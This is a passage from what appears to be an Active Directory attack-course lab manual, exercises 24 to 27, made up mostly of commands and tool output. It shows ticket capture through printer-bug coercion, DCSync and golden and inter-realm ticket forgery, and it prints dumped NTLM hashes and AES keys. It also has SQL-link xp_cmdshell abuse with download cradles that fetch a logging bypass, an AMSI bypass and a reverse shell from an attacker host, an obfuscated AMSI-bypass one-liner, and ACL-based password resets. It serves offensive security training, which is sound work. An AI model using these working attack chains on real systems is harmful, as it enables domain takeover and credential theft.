[*] Hash NTLM : 83ac1bab3e98ce6ed70c9d5841341538
[*] ntlm- 0 : 83ac1bab3e98ce6ed70c9d5841341538
[*] lm - 0 : bcb73c3d2b4005e405ff7399f3ca2bf0
[*]
[*] Supplemental Credents:
[*]
[*] * Primary:NTLM-Strong-NTOWF
[*] Random Value : a0c1c86edafc0218a106426f2309bafd
[*]
[*] * Primary:Kerberos-Newer-Keys
[*] Default Salt :EU.LOCALkrbtgt
[*] Credents
[*] aes256_hmac 4096:
b3b88f9288b08707eab6d561fefe286c178359bda4d9ed9ea5cb2bd28540075d
[*] aes128_hmac 4096: e2ef89cdbd94d396f63c9aa5b66e16c7
[snip]

C:\Users\studentuserx>C:\AD\Tools\SharpKatz.exe --Command dcsync --User
eu\administrator --Domain eu.local --DomainController eu-dc.eu.local

Hands-on 24:
Task
• Abuse the Unconstrained Delegation on us-web to get Enterprise Admin privileges on
usvendor.local.

Solution
If TGT Delegation is enabled across forests trusts, we can abuse the printer bug across two-way forest
trusts as well. This hands-on is kept separate from the previous ones because the impact is very high!
The commands included are the same!

Start a new process as webmaster, who has admin privileges on us-web:

C:\Windows\system32> C:\AD\Tools\Rubeus.exe asktgt /domain:us.techcorp.local

/user:webmaster
/aes256:2a653f166761226eb2e939218f5a34d3d2af005a91f160540da6e4a5e29de8a0
/opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
[snip]

Copy Rubeus.exe to us-web and start monitoring for any authentication from usvendor-dc. Run the
below command in process running as webmaster:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Rubeus.exe \\us-

web\C$\Users\Public\Rubeus.exe /Y
[snip]

C:\Windows\system32>winrs -r:us-web cmd.exe

C:\Users\webmaster>C:\Users\Public\Rubeus.exe monitor /targetuser:usvendor-

dc$ /interval:5 /nowrap
C:\Users\Public\Rubeus.exe monitor /targetuser:usvendor-dc$ /interval:5
/nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: TGT Monitoring
[*] Target user : usvendor-dc$
[*] Monitoring every 5 seconds for new TGTs

Next, run MS-RPRN.exe on the student VM to abuse the printer bug. Note that this time we target
usvendor-dc:

C:\AD\Tools>C:\AD\Tools\MS-RPRN.exe \\usvendor-dc.usvendor.local \\us-

web.us.techcorp.local
Target server attempted authentication and got an access denied. If coercing
authentication to an NTLM challenge-response capture tool(e.g.
responder/inveigh/MSF SMB capture), this is expected and indicates the
coerced authentication worked.

On the session where Rubeus is running, we can see:

[snip]
[*] 1/15/2021 2:09:34 PM UTC - Found new TGT:

User : [email protected]
StartTime : 1/15/2021 6:08:09 AM
EndTime : 1/15/2021 4:08:07 PM
RenewTill : 12/31/1969 4:00:00 PM
Flags : name_canonicalize, pre_authent, forwarded,
forwardable
Base64EncodedTicket : [snip]

[*] Ticket cache size: 1

We can copy Base64EncodedTicket, remove unnecessary spaces and newline (if any) and use the ticket
with Rubes on the student VM:

C:\AD\Tools> C:\AD\Tools\Rubeus.exe ptt /ticket:TGTofUSVendor-DC$

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Import Ticket

[+] Ticket successfully imported!

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 104
We can now run DCSync attack against usvendor-dc using the injected ticket:

C:\AD\Tools>C:\AD\Tools\SharpKatz.exe --Command dcsync --User usvendor\krbtgt

--Domain usvendor.local --DomainController usvendor-dc.usvendor.local
[*]
[*] System Information
[*] ----------------------------------------------------------------------
[*] | Platform: Win32NT |
[*] ----------------------------------------------------------------------
[*] | Major: 10 | Minor: 0 | Build: 17763 |
[*] ----------------------------------------------------------------------
[*] | Version: Microsoft Windows NT 6.2.9200.0 |
[*] ----------------------------------------------------------------------
[*]
[!] usvendor.local will be the domain
[!] usvendor-dc.usvendor.local will be the DC server
[!] usvendor\krbtgt will be the user account
[*]
[*] Object RDN : krbtgt
[*]
[*] ** SAM ACCOUNT **
[*]
[*] SAM Username : krbtgt
[*] User Principal Name :
[*] Account Type : USER_OBJECT
[*] User Account Control : ACCOUNTDISABLE, NORMAL_ACCOUNT
[*] Account expiration : 12/31/9999 11:59:59 PM
[*] Password last change : 7/12/2019 10:09:18 PM
[*] Object Security ID : S-1-5-21-2028025102-2511683425-2951839092-502
[*] Object Relative ID : 502
[*]
[*] Credents:
[*] Hash NTLM : 335caf1a29240a5dd318f79b6deaf03f
[snip]

Hands-on 25:
Task
• Using the DA access to eu.local:
− Access eushare on euvendor-dc.
− Access euvendor-net using PowerShell Remoting.

Solution
We have DA access on the eu.local forest that has a trust relationship with euvendor.local. Let's use the
trust key between eu.local and euvendor.local. We can extract the trust key using a Golden ticket (or
Administrator keys) for eu.local.

Access eushare on euvendor-dc

Run the below command from an elevated shell on the student VM to get a command prompt with the
privileges of domain administrator on eu.local and use DCSync to get the trust keys:

C:\Windows\system32>C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/user:Administrator /domain:eu.local /sid:S-1-5-21-3657428294-2017276338-
1274645009
/aes256:b3b88f9288b08707eab6d561fefe286c178359bda4d9ed9ea5cb2bd28540075d
/ptt"
[snip]
Golden ticket for 'Administrator @ eu.local' successfully submitted for
current session
[snip]

mimikatz# lsadump::dcsync /user:eu\euvendor$ /domain:eu.local

[DC] 'eu.local' will be the domain
[DC] 'EU-DC.eu.local' will be the DC server
[DC] 'eu\euvendor$' will be the user account

Object RDN : EUVENDOR$

** SAM ACCOUNT **

SAM Username : EUVENDOR$

Account Type : 30000002 ( TRUST_ACCOUNT )
User Account Control : 00000820 ( PASSWD_NOTREQD INTERDOMAIN_TRUST_ACCOUNT )
Account expiration :
Password last change : 1/7/2021 6:04:14 AM
Object Security ID : S-1-5-21-3657428294-2017276338-1274645009-1107
Object Relative ID : 1107

Credentials:
Hash NTLM: bd5aba58c5876f08eb56fff91fa61c5d
[snip]
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *

Default Salt : EU.LOCALkrbtgtEUVENDOR
Default Iterations : 4096
Credentials
aes256_hmac (4096) :
50a86b4c31c43245c61dcda8ec2d678c97a14a942f223ec1f8c447106e2e78d9
aes128_hmac (4096) : b5cf74c22109c8b3b9994e727457c345
des_cbc_md5 (4096) : 611a407631683b51
[snip]
mimikatz # exit
Bye!

Copy BetterSafetyKatz and Rubes on eu-dc. Run the below commands in the above process where we
injected the Golden ticket for eu.local:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\BetterSafetyKatz.exe \\eu-

dc.eu.local\C$\Users\Public\BetterSafetyKatz.exe /Y
[snip]
C:\Windows\system32>echo F | xcopy C:\AD\Tools\Rubeus.exe \\eu-
dc.eu.local\C$\Users\Public\Rubeus.exe /Y
[snip]

Now, forge an inter-realm TGT between eu.local and euvendor.local. We need to run the following
commands from eu-dc:

C:\Windows\system32>winrs -r:eu-dc.eu.local cmd

C:\Users\Administrator>C:\Users\Public\BetterSafetyKatz.exe "kerberos::golden
/user:Administrator /domain:eu.local /sid:S-1-5-21-3657428294-2017276338-
1274645009 /rc4:629b1eaa7ec6cfe2f4943a853ad6b36b /service:krbtgt
/target:euvendor.local /sids:S-1-5-21-4066061358-3942393892-617142613-519
/ticket:C:\Users\Public\sharedwitheu.kirbi" "exit"
[snip]
User : Administrator
Domain : eu.local (EU)
SID : S-1-5-21-3657428294-2017276338-1274645009
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-4066061358-3942393892-617142613-519 ;
XU2M3OZKey: 629b1eaa7ec6cfe2f4943a853ad6b36b - rc4_hmac_nt
XU2M3OZ : krbtgt
Target : euvendor.local
Lifetime : 1/15/2021 7:14:33 AM ; 1/13/2031 7:14:33 AM ; 1/13/2031 7:14:33
AM
-> Ticket : C:\Users\Public\sharedwitheu.kirbi

* PAC generated
* PAC signed

* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

3XWS2ZJ9(commandline) # exit
Bye!
[snip]

So, we have forged an inter-realm TGT. Let's inject it in our winrs session:

C:\Users\Administrator>C:\Users\Public\Rubeus.exe asktgs
/ticket:C:\Users\Public\sharedwitheu.kirbi /service:CIFS/euvendor-
dc.euvendor.local /dc:euvendor-dc.euvendor.local /ptt
C:\Users\Public\Rubeus.exe asktgs /ticket:C:\Users\Public\sharedwitheu.kirbi
/service:CIFS/euvendor-dc.euvendor.local /dc:euvendor-dc.euvendor.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Ask TGS

[*] Using domain controller: euvendor-dc.euvendor.local (192.168.12.212)

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the
service ticket
[*] Building TGS-REQ request for: 'CIFS/euvendor-dc.euvendor.local'
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
[snip]
ServiceName : CIFS/euvendor-dc.euvendor.local
ServiceRealm : EUVENDOR.LOCAL
UserName : Administrator
UserRealm : eu.local
StartTime : 1/15/2021 7:14:42 AM
EndTime : 1/15/2021 5:14:42 PM
RenewTill : 1/1/0001 12:00:00 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent,
forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 4SrQNQ7dBya+YjlO7iT851dZAGXSRZB7h1kKldDS9tg=

Check for the ticket:

C:\Users\Administrator>klist
klist

[snip]
#2> Client: Administrator @ eu.local
Server: CIFS/euvendor-dc.euvendor.local @ EUVENDOR.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40250000 -> forwardable pre_authent ok_as_delegate
name_canonicalize
Start Time: 1/15/2021 7:14:42 (local)
End Time: 1/15/2021 17:14:42 (local)
Renew Time: 0
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

So, we have the TGS for CIFS on euvendor.local. We can only access the resources explicitly shared with
Domain Admins of eu.local as we have the access to euvendor-dc as domain admins of eu.local:

C:\Users\Administrator>dir \\euvendor-dc.euvendor.local\eushare
dir \\euvendor-dc.euvendor.local\eushare
Volume in drive \\euvendor-dc.euvendor.local\eushare has no label.
Volume Serial Number is 88AD-6C8B

Directory of \\euvendor-dc.euvendor.local\eushare

07/14/2019 05:12 AM <DIR> .

07/14/2019 05:12 AM <DIR> ..
07/14/2019 05:13 AM 37 shared.txt
1 File(s) 37 bytes
2 Dir(s) 15,983,722,496 bytes free

C:\Users\Administrator>type \\euvendor-dc.euvendor.local\eushare\shared.txt
type \\euvendor-dc.euvendor.local\eushare\shared.txt
Shared with Domain Admins of eu.local
C:\Users\Administrator>exit
exit

C:\Windows\system32

Note that we could use PowerShell Remoting too in place of winrs in the above steps.

Access euvendor-net using PowerShell Remoting
Let's check if SIDHistroy is enabled for the trust between eu.local and euvendor.local using the Active
Directory module.

Run the below commands on the command prompt where we injected the Golden ticket for
administrator of eu.local to copy and run InvisiShell:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\InviShell\InShellProf.dll

\\eu-dc.eu.local\C$\Users\Public\InShellProf.dll /Y
[snip]

C:\Windows\system32>echo F | xcopy
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat \\eu-
dc.eu.local\C$\Users\Public\RunWithRegistryNonAdmin.bat /Y
[snip]
C:\Windows\system32>winrs -r:eu-dc.eu.local cmd
Microsoft Windows [Version 10.0.17763.1613]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Administrator>C:\Users\Public\RunWithRegistryNonAdmin.bat
[snip]

With InvisiShell set up on eu-dc, We can now use the Active Directory module. Since we are on a domain
controller, the module will be already present.

Check if there are any groups with SID>1000 in euvendor.local that we can impersonate to avoid
SIDFiltering:

PS C:\Users\Administrator> Get-ADGroup -Filter 'SID -ge "S-1-5-21-4066061358-

3942393892-617142613-1000"' -Server euvendor.local
Get-ADGroup -Filter 'SID -ge "S-1-5-21-4066061358-3942393892-617142613-1000"'
-Server euvendor.local

[snip]

DistinguishedName : CN=EUAdmins,CN=Users,DC=euvendor,DC=local
GroupCategory : Security
GroupScope : Global
Name : EUAdmins
ObjectClass : group
ObjectGUID : 1dad0633-fcf5-49dc-9431-8b167cf36969
SamAccountName : euadmins
SID : S-1-5-21-4066061358-3942393892-617142613-1103

PS C:\Users\Administrator> exit
exit

C:\Users\Administrator>set COR_ENABLE_PROFILING=

C:\Users\Administrator>set COR_PROFILER=

C:\Users\Administrator>REG DELETE "HKCU\Software\Classes\CLSID\{cf0d821e-

299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.

Let's create an inter-realm ticket between eu.local and euvendor.local. We will inject the SID History for
the EUAdmins group as that is allowed across the trust:

Using the inter-realm TGT that we created above, let's request a TGS for HTTP on euvendor-net
machine:

C:\Users\Administrator>C:\Users\Public\Rubeus.exe asktgs
/ticket:C:\Users\Public\euvendornet.kirbi /service:HTTP/euvendor-
net.euvendor.local /dc:euvendor-dc.euvendor.local /ptt

[snip]
ServiceName : HTTP/euvendor-net.euvendor.local
ServiceRealm : EUVENDOR.LOCAL
UserName : Administrator
UserRealm : eu.local
StartTime : 1/15/2021 7:38:46 AM
EndTime : 1/15/2021 5:38:46 PM
[snip]

Finally, try accessing the euvendor-net machine:

C:\Users\Administrator>winrs -r:euvendor-net.euvendor.local cmd

winrs -r:euvendor-net.euvendor.local cmd

Microsoft Windows [Version 10.0.17763.1613]

C:\Users\Administrator.EU>whoami
whoami
eu\administrator

C:\Users\Administrator.EU>hostname
hostname
EUVendor-Net

C:\Users\Administrator.EU>whoami /groups
whoami /groups

GROUP INFORMATION
-----------------

Group Name Type SID

Attributes
==================================== ================
=============================================
===============================================================
Everyone Well-known group S-1-1-0
Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545
Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544
Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2
Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11
Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15
Mandatory group, Enabled by default, Enabled group
EU\Domain Admins Group S-1-5-21-3657428294-
2017276338-1274645009-512 Mandatory group, Enabled by default, Enabled group
EU\Group Policy Creator Owners Group S-1-5-21-3657428294-
2017276338-1274645009-520 Mandatory group, Enabled by default, Enabled group
EU\Schema Admins Group S-1-5-21-3657428294-
2017276338-1274645009-518 Mandatory group, Enabled by default, Enabled group
EU\Enterprise Admins Group S-1-5-21-3657428294-
2017276338-1274645009-519 Mandatory group, Enabled by default, Enabled group
EUVENDOR\euadmins Group S-1-5-21-4066061358-
3942393892-617142613-1103 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288

Hands-On 26:
Task
• Get a reverse shell on a db-sqlsrv in db.local forest by abusing database links from us-mssql.

Solution
Let’s first enumerate database links on all the sql servers, we just need public access on for that. Let’s
see if studentuserx has that access on any database in the domain. We will use PowerUpSQL for this
from InvisiShell:

PS C:\AD\Tools> Import-Module .\PowerupSQL-master\PowerupSQL.psd1

PS C:\AD\Tools> Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
VERBOSE: us-mssql.us.techcorp.local : Connection Success.

ComputerName : us-mssql.us.techcorp.local
Instance : US-MSSQL
DomainName : US
ServiceProcessID : 3032
ServiceName : MSSQLSERVER
ServiceAccount : US\dbservice
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 14.0.1000.169
SQLServerMajorVersion : 2017
SQLServerEdition : Developer Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : US\studentuserx
IsSysadmin : No
ActiveSessions : 1

So we have non-sysadmin access to us-mssql. Let's enumerate database links for us-mssql:

PS C:\AD\Tools> Get-SQLServerLink -Instance us-mssql.us.techcorp.local -

Verbose
VERBOSE: us-mssql.us.techcorp.local : Connection Success.

[snip]

ComputerName : us-mssql.us.techcorp.local
Instance : us-mssql.us.techcorp.local
DatabaseLinkId : 1
DatabaseLinkName : 192.168.23.25
DatabaseLinkLocation : Remote
Product : SQL Server

Provider : SQLNCLI
Catalog :
LocalLogin :
RemoteLoginName :
is_rpc_out_enabled : False
is_data_access_enabled : True
modify_date : 7/9/2019 6:54:54 AM

So, there is a database link to a SQL Server from us-mssql server. Using HeidiSQL client, let’s login to us-
mssql using windows authentication of studentuserx. Once logged-in, use openquery to enumerate
linked databases:

select * from master..sysservers

It is possible to nest openquery within another openquery which leads us to ops-file:

select * from openquery("192.168.23.25",'select * from master..sysservers')

select * from openquery("192.168.23.25 ",'select * from openquery("db-
sqlsrv",''select @@version as version'')')

We can also use Get-SQLServerLinkCrawl from PowerUpSQL for crawling the database links
automatically:

PS C:\AD\Tools> Get-SQLServerLinkCrawl -Instance us-mssql -Verbose

VERBOSE: us-mssql : Connection Success.
VERBOSE: us-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: US-MSSQL
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: US-MSSQL
VERBOSE: - Link Login: US\studentuserx
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: 192.168.23.25
VERBOSE: us-mssql : Connection Success.
VERBOSE: us-mssql : Connection Success.

VERBOSE: --------------------------------
VERBOSE: Server: DB-SQLPROD
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: US-MSSQL -> 192.168.23.25
VERBOSE: - Link Login: dbuser
VERBOSE: - Link IsSysAdmin: 1
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: DB-SQLSRV
VERBOSE: us-mssql : Connection Success.
VERBOSE: us-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DB-SQLSRV
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: US-MSSQL -> 192.168.23.25 -> DB-SQLSRV
VERBOSE: - Link Login: sa
VERBOSE: - Link IsSysAdmin: 1
VERBOSE: - Link Count: 0
VERBOSE: - Links on this server:

Version : SQL Server 2017

Instance : US-MSSQL
CustomQuery :
Sysadmin : 0
Path : {US-MSSQL}
User : US\studentuserx
Links : {192.168.23.25}

Version : SQL Server 2017

Instance : DB-SQLPROD
CustomQuery :
Sysadmin : 1
Path : {US-MSSQL, 192.168.23.25}
User : dbuser
Links : {DB-SQLSRV}

Version : SQL Server 2017

Instance : DB-SQLSRV
CustomQuery :
Sysadmin : 1
Path : {US-MSSQL, 192.168.23.25, DB-SQLSRV}
User : sa
Links :

So, we do have database links to other SQL Servers.

If xp_cmdshell is enabled (or rpcout is true that allows us to enable xp_cmdshell), it is possible to
execute commands on any node in the database links using the below commands.

Try to execute a command on each node where xp_cmdshell is enabled:

PS C:\AD\Tools> Get-SQLServerLinkCrawl -Instance us-mssql -Query 'exec

master..xp_cmdshell ''whoami'''

Version : SQL Server 2017

Instance : US-MSSQL
CustomQuery :
Sysadmin : 0
Path : {US-MSSQL}
User : US\studentuserx
Links : {192.168.23.25}

Version : SQL Server 2017

Instance : DB-SQLPROD
CustomQuery : {nt service\mssqlserver, }
Sysadmin : 1
Path : {US-MSSQL, 192.168.23.25}
User : dbuser
Links : {DB-SQLSRV}

Version : SQL Server 2017

Instance : DB-SQLSRV
CustomQuery :
Sysadmin : 1
Path : {US-MSSQL, 192.168.23.25, DB-SQLSRV}
User : sa
Links :

Sweet! Looks like we can run operating system commands on DB-SQLPROD instance.

Let’s try to execute a PowerShell reverse shell. We must first start a listener from InvisiShell:

PS C:\AD\Tools> . .\powercat.ps1
PS C:\AD\Tools> powercat -l -v -p 443 -t 1000
VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Console
VERBOSE: Setting up Stream 1...
VERBOSE: Listening on [0.0.0.0] (port 443)

Now, use the PowerShell download execute cradle to run the reverse shell on DB-SQLPROD. Note that in
the below command, we first run an ScriptBlock logging bypass, then an AMSI bypass and finally, the
reverse shell. Remember to host all of them on a local web server:

PS C:\AD\Tools> Get-SQLServerLinkCrawl -Instance us-mssql -Query 'exec

master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing
http://192.168.100.X/sbloggingbypass.txt);iex (iwr -UseBasicParsing
http://192.168.100.X/amsibypass.txt);iex (iwr -UseBasicParsing
http://192.168.100.X/Invoke-PowerShellTcpEx.ps1)"'''
[snip]

On listener on 192.168.100.X. Note that you may need to press 'Enter' couple of times on powercat
listener to wake it up from slumber:

PS C:\AD\Tools> powercat -l -v -p 443 -t 1000

VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Console
VERBOSE: Setting up Stream 1...
VERBOSE: Listening on [0.0.0.0] (port 443)
VERBOSE: Connection from [192.168.23.25] port [tcp] accepted (source port
52937)
VERBOSE: Setting up Stream 2...
VERBOSE: Both Communication Streams Established. Redirecting Data Between
Streams...

Windows PowerShell running as user MSSQLSERVER on DB-SQLPROD

PS C:\Windows\system32> whoami
nt service\mssqlserver
PS C:\Windows\system32> hostname
DB-SQLProd

Because the link from DB-SQLProd to DB-SQLSrv is configured to use sa. We can enable RPC Out and
xp_cmdshell on DB-SQLSrv! Run the below commands on the reverse shell we got above. Ignore the
scary looking message after the first command:

PS C:\Windows\system32> Invoke-SqlCmd -Query "exec sp_serveroption

@server='db-sqlsrv', @optname='rpc', @optvalue='TRUE'"
Import-Module : The specified module 'SQLASCmdlets' was not loaded because no
valid module file was found in any module directory.
PS C:\Windows\system32> Invoke-SqlCmd -Query "exec sp_serveroption
@server='db-sqlsrv', @optname='rpc out', @optvalue='TRUE'"
PS C:\Windows\system32> Invoke-SqlCmd -Query "EXECUTE ('sp_configure ''show
advanced options'',1;reconfigure;') AT ""db-sqlsrv"""
PS C:\Windows\system32> Invoke-SqlCmd -Query "EXECUTE('sp_configure
''xp_cmdshell'',1;reconfigure') AT ""db-sqlsrv"""

PS C:\Windows\system32> exit
VERBOSE: Failed to redirect data from Stream 1 to Stream 2

Let's try to execute commands on all the link nodes again and check if it works on db-sqlsrv too:

PS C:\AD\Tools> Get-SQLServerLinkCrawl -Instance us-mssql -Query 'exec

master..xp_cmdshell ''whoami'''
[snip]
Version : SQL Server 2017
Instance : DB-SQLPROD
CustomQuery : {nt service\mssqlserver, }
Sysadmin : 1
Path : {US-MSSQL, 192.168.23.25}
User : dbuser
Links : {DB-SQLSRV}

Version : SQL Server 2017

Instance : DB-SQLSRV
CustomQuery : {db\srvdba, }
Sysadmin : 1
Path : {US-MSSQL, 192.168.23.25, DB-SQLSRV}
User : sa
Links :

Sweet!

Now, to execute commands only on a particular node (DB-SQLSRV), use the below command in
HeidiSQL. Remember to start the listener before running the below command:

select * from openquery("192.168.23.25",'select * from openquery("db-

sqlsrv",''select @@version as version;exec master..xp_cmdshell ''''powershell
-c "iex (iwr -UseBasicParsing http://192.168.100.x/sbloggingbypass.txt);iex
(iwr -UseBasicParsing http://192.168.100.x/amsibypass.txt);iex (iwr -
UseBasicParsing http://192.168.100.x/Invoke-PowerShellTcp.ps1)"'''''')')

or use the below command from PowerUpSQL:

PS C:\AD\Tools> Get-SQLServerLinkCrawl -Instance us-mssql -Query 'exec

master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing
http://192.168.100.x/sbloggingbypass.txt);iex (iwr -UseBasicParsing
http://192.168.100.x/amsibypass.txt);iex (iwr -UseBasicParsing
http://192.168.100.x/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget db-sqlsrv

[snip]

On the listener:

PS C:\AD\Tools> powercat -l -v -p 443 -t 1000

VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Console
VERBOSE: Setting up Stream 1...
VERBOSE: Listening on [0.0.0.0] (port 443)
VERBOSE: Connection from [192.168.23.36] port [tcp] accepted (source port
54015)
VERBOSE: Setting up Stream 2...
VERBOSE: Both Communication Streams Established. Redirecting Data Between
Streams...
Windows PowerShell running as user srvdba on DB-SQLSRV
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
db\srvdba
PS C:\Windows\system32> $env:UserDNSDomain
DB.LOCAL

Hands-On 27:
Task
• Using the reverse shell on db.local:
− Execute cross forest attack on dbvendor.local by abusing ACLs
• Enumerate FSPs for db.local and escalate privileges to DA by compromising the FSPs.

Solution
On the reverse shell we have on db-sqlsrv, we can use PowerView to enumerate ACLs.

Run the following commands on the reverse shell. We are bypassing AMSI first and then using a
download-execute cradle to load PowerView:

PS C:\Windows\system32> S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') +

('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varIÀ`BLE (
('1Q'+'2U') +'zX' ) -VaL )."A`ssÈmbly"."GET`TY`Pe"((
"{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."gètfìElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${nÙLl},${t`RuE} )

PS C:\Windows\system32> iex (New-Object

Net.WebClient).DownloadString('http://192.168.100.x/PowerView.ps1')
PS C:\Windows\system32> Get-ForestTrust

TopLevelNames : {dbvendor.local}
ExcludedTopLevelNames : {}
TrustedDomainInformation : {dbvendor.local}
SourceName : db.local
TargetName : dbvendor.local
TrustType : Forest
TrustDirection : Bidirectional

Enumerate interesting ACLs in the dbvendor.local domain:

PS C:\Windows\system32> Find-InterestingDomainAcl -ResolveGUIDs -Domain

dbvendor.local
[snip]
ObjectDN : CN=dbxsvc,CN=Users,DC=dbvendor,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed

InheritanceFlags : None
SecurityIdentifier : S-1-5-21-2781415573-3701854478-2406986946-4101
IdentityReferenceName : srvdba
IdentityReferenceDomain : db.local
IdentityReferenceDN : CN=srvdba,CN=Users,DC=db,DC=local
IdentityReferenceClass : user

ObjectDN : CN=db24svc,CN=Users,DC=dbvendor,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-2781415573-3701854478-2406986946-1105
IdentityReferenceName : srvdba
IdentityReferenceDomain : db.local
IdentityReferenceDN : CN=srvdba,CN=Users,DC=db,DC=local
IdentityReferenceClass : user
[snip]

So, srvdba has GenericAll over dbxsvc users in dbvendor.local domain. We can do many things with
GenericAll on a user object like Reset Password, Set SPN on user etc. Reset password of dbxsvc user that
matches your student user ID:

PS C:\Windows\system32> Set-DomainUserPassword -Identity dbxsvc -

AccountPassword (ConvertTo-SecureString 'Password@123' -AsPlainText -Force) -
Domain dbvendor.local –Verbose
[snip]

Sweet! We just got access to the dbxsvc user in dbvendor.local. Now, let's enumerate FSPs for db.local.
Run the below commands on the reverse shell:

PS C:\Windows\system32> Find-ForeignGroup –Verbose

[snip]
GroupDomain : db.local
GroupName : Administrators
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=db,DC=local
MemberDomain : db.local
MemberName : S-1-5-21-569087967-1859921580-1949641513-4102
MemberDistinguishedName : CN=S-1-5-21-569087967-1859921580-1949641513-
4102,CN=ForeignSecurityPrincipals,DC=db,DC=local

GroupDomain : db.local
GroupName : Administrators
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=db,DC=local
MemberDomain : db.local
MemberName : S-1-5-21-569087967-1859921580-1949641513-4101

MemberDistinguishedName : CN=S-1-5-21-569087967-1859921580-1949641513-
4101,CN=ForeignSecurityPrincipals,DC=db,DC=local
[snip]

And no surprise, the FSPs who are part of the built-in Administrators group are the dbxsvc users:

PS C:\Windows\system32> Get-DomainUser -Domain dbvendor.local |

?{$_.ObjectSid -eq 'S-1-5-21-569087967-1859921580-1949641513-4101'}

logoncount : 0
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=db23svc,CN=Users,DC=dbvendor,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : db23svc
userprincipalname : db23svc
name : db23svc
objectsid : S-1-5-21-569087967-1859921580-1949641513-4101
samaccountname : db23svc
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 1/8/2021 6:18:45 AM
instancetype : 4
usncreated : 41125
objectguid : 60d90772-7a30-4217-81ec-71d28c4ae797
sn : svc
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory :
CN=Person,CN=Schema,CN=Configuration,DC=dbvendor,DC=local
dscorepropagationdata : {1/8/2021 6:18:45 AM, 1/8/2021 6:18:45 AM, 1/1/1601
12:00:00 AM}
givenname : db23
lastlogon : 12/31/1600 4:00:00 PM
badpwdcount : 0
cn : db23svc
